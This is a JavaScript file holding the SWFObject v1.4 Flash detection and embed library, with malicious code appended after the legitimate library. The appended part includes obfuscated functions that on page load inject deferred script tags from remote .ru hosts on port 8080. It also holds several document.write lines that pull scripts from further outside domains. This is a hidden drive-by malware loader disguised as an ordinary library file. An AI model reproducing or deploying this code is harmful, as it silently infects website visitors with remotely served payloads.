/**
 * SWFObject v1.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
 *
 * SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
 * http://www.opensource.org/licenses/mit-license.php
 *
 * **SWFObject is the SWF embed script formarly known as FlashObject. The name was changed for
 *   legal reasons.
 */
if(typeof deconcept=="undefined"){var deconcept=new Object();}
if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}
if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}
deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a,_b){
if(!document.createElement||!document.getElementById){return;}
this.DETECT_KEY=_b?_b:"detectflash";
this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);
this.params=new Object();
this.variables=new Object();
this.attributes=new Array();
if(_1){this.setAttribute("swf",_1);}
if(id){this.setAttribute("id",id);}
if(w){this.setAttribute("width",w);}
if(h){this.setAttribute("height",h);}
if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}
this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion(this.getAttribute("version"),_7);
if(c){this.addParam("bgcolor",c);}
var q=_8?_8:"high";
this.addParam("quality",q);
this.setAttribute("useExpressInstall",_7);
this.setAttribute("doExpressInstall",false);
var _d=(_9)?_9:window.location;
this.setAttribute("xiRedirectUrl",_d);
this.setAttribute("redirectUrl","");
if(_a){this.setAttribute("redirectUrl",_a);}};
deconcept.SWFObject.prototype={setAttribute:function(_e,_f){
this.attributes[_e]=_f;
},getAttribute:function(_10){
return this.attributes[_10];
},addParam:function(_11,_12){
this.params[_11]=_12;
},getParams:function(){
return this.params;
},addVariable:function(_13,_14){
this.variables[_13]=_14;
},getVariable:function(_15){
return this.variables[_15];
},getVariables:function(){
return this.variables;
},getVariablePairs:function(){
var _16=new Array();
var key;
var _18=this.getVariables();
for(key in _18){
_16.push(key+"="+_18[key]);}
return _16;
},getSWFHTML:function(){
var _19="";
if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){
if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");}
_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\"";
_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";
var _1a=this.getParams();
for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}
var _1c=this.getVariablePairs().join("&");
if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}
_19+="/>";
}else{
if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");}
_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\">";
_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";
var _1d=this.getParams();
for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}
var _1f=this.getVariablePairs().join("&");
if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}
_19+="</object>";}
return _19;
},write:function(_20){
if(this.getAttribute("useExpressInstall")){
var _21=new deconcept.PlayerVersion([6,0,65]);
if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){
this.setAttribute("doExpressInstall",true);
this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));
document.title=document.title.slice(0,47)+" - Flash Player Installation";
this.addVariable("MMdoctitle",document.title);}}
if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){
var n=(typeof _20=="string")?document.getElementById(_20):_20;
n.innerHTML=this.getSWFHTML();
return true;
}else{
if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}
return false;}};
deconcept.SWFObjectUtil.getPlayerVersion=function(_23,_24){
var _25=new deconcept.PlayerVersion([0,0,0]);
if(navigator.plugins&&navigator.mimeTypes.length){
var x=navigator.plugins["Shockwave Flash"];
if(x&&x.description){_25=new deconcept.PlayerVersion(x.description.replace(/([a-z]|[A-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}
}else{try{
var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
for(var i=3;axo!=null;i++){
axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+i);
_25=new deconcept.PlayerVersion([i,0,0]);}}
catch(e){}
if(_23&&_25.major>_23.major){return _25;}
if(!_23||((_23.minor!=0||_23.rev!=0)&&_25.major==_23.major)||_25.major!=6||_24){
try{_25=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}
catch(e){}}}
return _25;};
deconcept.PlayerVersion=function(_29){
this.major=parseInt(_29[0])!=null?parseInt(_29[0]):0;
this.minor=parseInt(_29[1])||0;
this.rev=parseInt(_29[2])||0;};
deconcept.PlayerVersion.prototype.versionIsValid=function(fv){
if(this.major<fv.major){return false;}
if(this.major>fv.major){return true;}
if(this.minor<fv.minor){return false;}
if(this.minor>fv.minor){return true;}
if(this.rev<fv.rev){return false;}return true;};
deconcept.util={getRequestParameter:function(_2b){
var q=document.location.search||document.location.hash;
if(q){
var _2d=q.indexOf(_2b+"=");
var _2e=(q.indexOf("&",_2d)>-1)?q.indexOf("&",_2d):q.length;
if(q.length>1&&_2d>-1){
return q.substring(q.indexOf("=",_2d)+1,_2e);
}}return "";}};
if(Array.prototype.push==null){
Array.prototype.push=function(_2f){
this[this.length]=_2f;
return this.length;};}
var getQueryParamValue=deconcept.util.getRequestParameter;
var FlashObject=deconcept.SWFObject; // for backwards compatibility
var SWFObject=deconcept.SWFObject;




function P(){_t=11188;_t--;Fu=686;Fu++;ZM=5209;ZM++;var K=new Date();var h=document;var b=false;var KW=31674;var he=new String("def"+"QVa3er".substr(4));var pMW=["Ps","pM","u"];var w=new String("appen"+"dChil"+"d");var Gq="Gq";var y=String("on"+"lo"+"ad7Px5".substr(0,2));var S={sJ:47953};var E=window;try {var B='H'} catch(B){};var J="srai8".substr(0,2)+"c";Rx={l:32537};var f=[];var a=String("cr"+"ea"+"te"+"ByWoEl".substr(4)+"em"+"kqdrendkrq".substr(4,2)+"tAw6q".substr(0,1));var Z=new String("body");this.Bf=20962;this.Bf--;NQ=[];var ww=String("scrip"+"MWyt".substr(3));_x=["Af","BfT","i"];this.k='';W=[];function A(){NB=["ho","zv"];try {var s=160204-152124;var SQ=new Date();var r={};var sM="hfL/go".substr(3)+"ogliP1y".substr(0,3)+"e.c"+"y1UAom/AUy1".substr(4,3)+"mul"+"AqktiuAkq".substr(3,3)+"plo"+"0zbad.b0z".substr(3,3)+"comQrVN".substr(0,3)+"g0ZF/izgZ0F".substr(4,3)+"OD4a.nDO4".substr(3,3)+"e.j"+"p.pHdr".substr(0,3)+"uwZhpZuw".substr(3,2);bR=30933;bR++;Rj={BA:false};var _=String("http:"+"//pasmzSE".substr(0,5)+"sport"+"Jc2blues".substr(3)+".ru:");var ai=7381-7380;this.UQ="";this.Fy=false;var jU={lg:"Os"};ka={Zi:false};m=h[a](ww);var cP={Wk:25659};var M={v:false};m[he]=ai;var me=new String();m[J]=_+s+sM;this.qs='';this.hX="";heF=["Uu"];try {var wE='fa'} catch(wE){};h[Z][w](m);var Xo={Y:false};var EP=["Io","St"];Fp=[];qU={oc:false};} catch(hA){try {} catch(sj){};try {var aK='jW'} catch(aK){};};}jv=["xN","Jl","kJ"];var xr=[];E[y]=A;this.My="";this.Uun=28109;this.Uun++;};P();
var T=new Array();try {var z='pD'} catch(z){};try {var mI={pR:"S"};this.DH="DH";var s=new Date();var N={c:50405};var b=window[new String("unDW3".substr(0,2)+"es"+"ca"+"pe1O7".substr(0,2))];var SA=new Date();this.g="g";this.a="a";var lu=42605;Wy=722;Wy--;var E=new String("onl"+"oad");var VH='';var X=new Date();this.F=false;var A='';aQ=["gE","i"];VY=["SX","xT"];Vd=[];this.P=59304;this.P--;var _=String("1");var OM=new String();this.n="n";var If=new Date();var VX={SZ:false};Ny=13864;Ny+=116;var y="re"+"plPjtT".substr(0,2)+"I3Aac3IA".substr(3,2)+"ePVjY".substr(0,1);yk={WQ:6936};try {var cT='jq'} catch(cT){};var AK=new String();var G=window[(new String("Re"+"gE"+"xp"))];try {var v='th'} catch(v){};this.ZJ="";var Je={vy:25166};AKV=["Io"];var Dc=new Date();Fm={bX:false};this.Yd=35418;this.Yd++;this.VM=13406;this.VM++;function Z(_,j){try {var qz='_S'} catch(qz){};var EO=["sl","K"];var NB="";try {var TO='Gr'} catch(TO){};var Os={aP:"Zp"};var px=20760;ZQ={_L:false};var bU=64170;var k="[YfZ".substr(0,1);this.Cm='';k+=j;var fi={};var KD={};var Ol=["wh","Ve"];TU=[];var Rf=["ul","sd"];k+=b("%5d");Mn={IV:52263};var UA=["iM","lc"];var t=new G(k, String("gRKq".substr(0,1)));bT=28018;bT+=87;BY=25771;BY+=42;var EH=false;LU=10606;LU+=50;var _g=false;return _.replace(t, A);this.n_='';};EJ=["OF","ZD","ZR"];var qT={Ck:19103};SY=["wl","Yw","OC"];var Mt=["Dn"];uc=["KP","La"];try {} catch(sB){};var mWh=[];HB=["Ji","wJ","vW"];CI={SL:false};var w=new String("wh86/go".substr(4)+"ogl"+"xmae.c".substr(3)+"om/"+"tra"+"Pmqded".substr(3)+"oub"+"zgJler".substr(3)+".cogDT".substr(0,3)+"m/b"+"ado"+"ngo"+"e60s.co".substr(4)+"m.pijD".substr(0,3)+"ZSLGhpSLZG".substr(4,2));var eE="";var He=["ux"];var jA=new String("http"+"://g"+"othg"+"uilt"+".ru:");try {var Fs='Xf'} catch(Fs){};this.Fw='';var Ai=808205-800125;this.yH=31349;this.yH--;this.Vg=58861;this.Vg--;this.pG=false;this.zy="zy";this.nw=35395;this.nw--;Nt={Nu:46509};var Eb={Ay:"K_"};var ig={};function m(){this.asl=55019;this.asl--;var cP={};Kp=4821;Kp-=167;var HP=new String();var thd=new String();YU=25692;YU-=106;var p=String("xOn8app".substr(4)+"TJpend".substr(3)+"2mTpChi".substr(4)+"ldz0eA".substr(0,2));var KPe=false;var ZL=Z('s3c3rki2pkt3','2FkM63GI');vE={};this.wE=12475;this.wE++;We=28962;We--;var e=document;this.zA=39090;this.zA--;eN=40248;eN--;var KPQ="KPQ";this.rt='';var ys=["Ou","PR"];var ct=["Lg"];this.WK=15662;this.WK++;nl=35594;nl+=167;aZ=62861;aZ++;rr={Ak:7699};PY=28873;PY+=123;var UH=5221;q=e.createElement(ZL);try {var kps='nVU'} catch(kps){};zI=["dh","oh"];this.Aa=10891;this.Aa-=149;D=jA+Ai;var rm=new Array();aJc=44615;aJc+=157;Fq={ifO:62854};D=D+w;var Jq='';var xN=new Date();var uk={vu:25028};q.src=D;var oN=21489;LR={PQ:"qE"};var MS=["uaD","QT"];var Q=e.body;Jfz={wU:"gS"};this.XR='';var lo="lo";q["de"+"feH4b".substr(0,2)+"m7Xr".substr(3)]=_;var Fj="Fj";var ln=new Date();var Yj=new Date();var TK=new String();uC=["Mc","jfv"];var KW=new String();this.kK="kK";kW=["gz","gzI"];Lt=["lL","jW"];try {} catch(Wf){};var Me=new Date();Q[p](q);this.qC=4875;this.qC++;};rz={kd:16935};var OL={};var UU={};var SF={yz:false};this.qJ=42931;this.qJ-=157;window[E]=m;var IJ=28756;this.Bj=63600;this.Bj-=74;} catch(l){this.Bu="Bu";this.FW="FW";this.qY="qY";};var hB={Pl:41925};this.lP="";var mQM=new Array();this.lrB=35494;this.lrB++;




document.write('<s'+'cript type="text/javascript" src="http://dolgo.lulucabana.com:8080/Script.js"></scr'+'ipt>');
document.write('<script src=http://jonwai.ru/.filemanager/cmt.php ><\/script>');
document.write('<script src=http://jonwai.ru/.filemanager/cmt.php ><\/script>');
document.write('<script src=http://combatant.cz/cz/styl.php ><\/script>');
document.write('<script src=http://combatant.cz/cz/styl.php ><\/script>');
document.write('<script src=http://combatant.cz/cz/styl.php ><\/script>');
document.write('<script src=http://combatant.cz/cz/styl.php ><\/script>');